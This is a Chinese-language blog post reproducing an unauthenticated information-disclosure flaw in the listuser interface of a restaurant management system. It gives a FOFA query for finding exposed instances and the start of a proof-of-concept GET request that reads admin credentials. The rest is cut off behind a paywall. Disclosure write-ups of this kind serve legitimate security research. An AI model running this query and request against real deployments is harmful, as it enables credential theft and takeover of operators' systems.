喰星云·数字化餐饮服务系统 listuser 信息泄露漏洞复现

已于 2024-07-04 09:12:15 修改
阅读量327 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-06-20 17:47:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/139838908
版权

0x01 产品简介

喰星云·数字化餐饮服务系统是一款专为餐饮企业设计的综合性管理软件,旨在通过信息化手段提升餐饮企业的运营效率、降低运营成本,并实现数据驱动的决策管理。该系统包括供应链管理、财务管理、巡店管理、人力资源管理等多个模块,可全面覆盖餐饮企业的日常运营需求。覆盖餐饮企业从采购、库存、销售到财务、人力资源等各个环节,实现一体化管理。

0x02 漏洞概述

喰星云·数字化餐饮服务系统 listuser 接口处存在信息泄露漏洞,未经身份验证的远程攻击者可利用此漏洞读取后台管理员账号密码登录凭证信息,导致后台权限被控,造成信息泄露,使系统处于极不安全的状态。

0x03 复现环境

FOFA:body="tmp_md5_pwd"

0x04 漏洞复现

PoC

GET /chainsales/head/user/listuser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/53
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
专栏目录
订阅专栏
星云·数字化餐饮服务系统 多处 SQL注入漏洞复现
0xSec
07-14 2515
星云·数字化餐饮服务系统 not_out_depot.php、shelflife.php、not_finish.php、stock.php、getlist、getlistdata等多处接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务系统权限。
某购物商城系统commodtiy接口处存在任意文件上传漏洞
weixin_43167326的博客
05-10 875
某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
星云·数字化餐饮服务系统not_finish存在SQL注入漏洞
weixin_43167326的博客
08-15 667
星云-数字化餐饮服务系统 not_finish接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息.
Java项目:SSH土地信息管理系统平台
m0_74967853的博客
11-16 157
本项目包含管理员与用户两种角色;管理员角色包含以下功能:管理员登录,用户管理,分类管理,档案管理等功能。用户角色包含以下功能:用户登录与注册,查询土地类型,查询档案等功能。
基于springboot layui疫苗接种信息管理系统源码
weixin_2630663675的博客
12-21 331
基于springboot layui疫苗接种信息管理系统源码
用户信息管理系统
weixin_45804960的博客
09-02 7987
基于Java Servlet 构建的用户信息管理系统 核心功能 登录、注册 添加用户信息 删除某一个用户信息 删除选中的用户信息 分页查询所有用户信息 模糊查询用户信息 更新用户信息 重要知识点 简单的Web服务器设计能力 Java 操作 MySQL 数据库 数据库设计 json 的使用 强化 HTTP 协议的理解 Servlet 的使用 Java集合的使用 前端知识的简单使用,比如:HTML+CSS+JS 整体架构 项目整体基于HTTP协议,前端使用HTML+CSS+JS构建页面整体布局,后端采用
Java项目:SSM失物招领网站信息管理系统
08-17 516
本项目为后台管理系统,分为管理员与用户两种角色;
go-kratos 学习笔记(7) 服务发现服务间通信grpc调用
xgs736214763的博客
07-25 810
app/users/internal/data.go 加入 NewDiscovery和 NewOrderServiceClient,需要把新加的2个方法加入到 ProviderSet。分别启动users和orders 服务是都是注册成功的,由于注册的是http和grpc所有后面拼接的有http和grpc,调用的时候需要拼接上。服务间的通信使用的grpc,放到data层,实现的是从uses服务调用orders服务。再看orders服务的日志输出。在users下执行 wire。看日志输出 users。
php上线用户信息 列表添加删除,有数据库中的表,里面有用户信息,如何用PHP实现显示用户列表listUser 和删除用户delUser?...
weixin_33743292的博客
03-25 203
有数据库中的表,里面有用户信息,如何用PHP实现显示用户列表listUser 和删除用户delUser?mip版关注:102答案:2悬赏:20解决时间 2021-02-23 10:02已解决2021-02-23 04:54用户信息有id自动分配的, name用户姓名,password密码,real_name真实姓名,sex性别(0是男,1是女),telphone电话,mem_no工号,...
listUser.jsp
11-19
listUser.jsp
JSP做的用户信息登录系统
04-15
在这个"JSP做的用户信息登录系统"中,JSP被用来创建交互式的用户界面,处理用户的登录请求。 **用户信息登录系统** 是一个常见的Web应用,它通常包含用户注册、登录、修改信息、删除账户等功能。在这个系统中,用户...
1_listUser.jsp
11-02
1_listUser.jsp
小琳AI课堂:确保大语言模型安全的八大策略--从数据隐私到用户教育
最新发布
wx740851326的博客
09-15 100
首先,我们要明白,保证大语言模型的安全,需要从多个方面入手,确保模型在技术、法律、伦理和社会层面都得到妥善处理。大家好,这里是小琳AI课堂。今天我们深入探讨如何保证大语言模型的安全,这可是关系到我们每个人哦!
AI在医学领域:医学AI的安全与隐私全面概述
声纹感知 洞察芯声
09-12 1287
本文通过系统化地检查医疗应用领域并为未来的攻击研究奠定基础,提供一个医疗领域AI攻击研究的全面视角。
SSHamble:一款针对SSH技术安全的研究与分析工具
FreeBuf_的博客
09-11 1066
SSHamble是一款功能强大的SSH技术安全分析与研究工具,该工具基于Go语言开发,可以帮助广大研究人员更好地分析SSH相关的安全技术与缺陷问题。
无限边界:现代整合安全如何保护云
网络研究观
09-15 570
通过工具之间更有效的数据共享,整合的安全平台还应提供更紧密的安全集成以及更强的系统可视性(无论是在云端还是在本地),让您能够看到无限周界的边缘。
伙房食堂电气安全新挑战:油烟潮湿环境下,如何筑起电气火灾“防火墙”?
acrel002的博客
09-12 418
安科瑞的智能安全配电装置打破了传统用电防护领域中仅仅只能做到“事后处理”的技术瓶颈,提前将配电转换安全电,从源头抑制电弧火花的产生,大大降低火灾风险,同时系统实时监测电气线路中电压、电流、功率、温度、剩余(漏)电流、对地绝缘阻值等关键数据,智能识别电路异常风险,及时将报警信息传送至云管理系统,提醒用户单位及时进行故障排查。近几年,随着我国经济的飞速发展,食堂餐饮也经历了一场变革,越来越多的电器走进了伙房食堂中,实现了电气化,为人们提供了高效便利的饮食服务,但同时也增加了火灾负荷。
消防指挥中心控制台:守护安全的关键枢纽
JiaDeLi_console的博客
09-11 412
它不仅是信息的接收者,更是行动的发起者,协调各方资源,确保消防救援工作高效、有序地进行。消防指挥中心控制台是消防救援工作的关键环节,它以先进的设计、强大的功能和不断升级的科技,为守护人民生命财产安全发挥着不可替代的作用。在未来,随着科技的进一步发展,相信消防指挥中心控制台将变得更加智能、高效,为构建更加安全的社会环境贡献更大的力量。同时,控制台还配备了舒适的座椅,为指挥人员提供良好的工作条件。在消防应急救援的战场上,嘉德立消防指挥中心控制台犹如一座坚实的堡垒,发挥着至关重要的作用。二、先进的设计与功能。
我如何在java里快速查看List<User> listuser用户信息的数量。在循环遍历得到信息数量的时候是否有索引index之类的
05-31
要快速查看List<User> listuser的用户信息数量,可以使用List的size()方法,该方法返回List中元素的数量。示例代码如下: ``` List<User> listuser = new ArrayList<User>(); // 添加用户信息listuser中 int size = listuser.size(); // 获取用户信息数量 System.out.println("用户信息数量为:" + size); ``` 在循环遍历List<User> listuser时,可以使用for循环并结合List的get()方法来获取List中的元素信息。示例代码如下: ``` for (int i = 0; i < listuser.size(); i++) { User user = listuser.get(i); // 获取第i个用户信息 // 处理用户信息 // ... } ``` 也可以使用foreach循环来遍历List<User> listuser,示例代码如下: ``` for (User user : listuser) { // 处理用户信息 // ... } ``` 在foreach循环中,可以直接获取List中的元素信息,无需使用get()方法。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值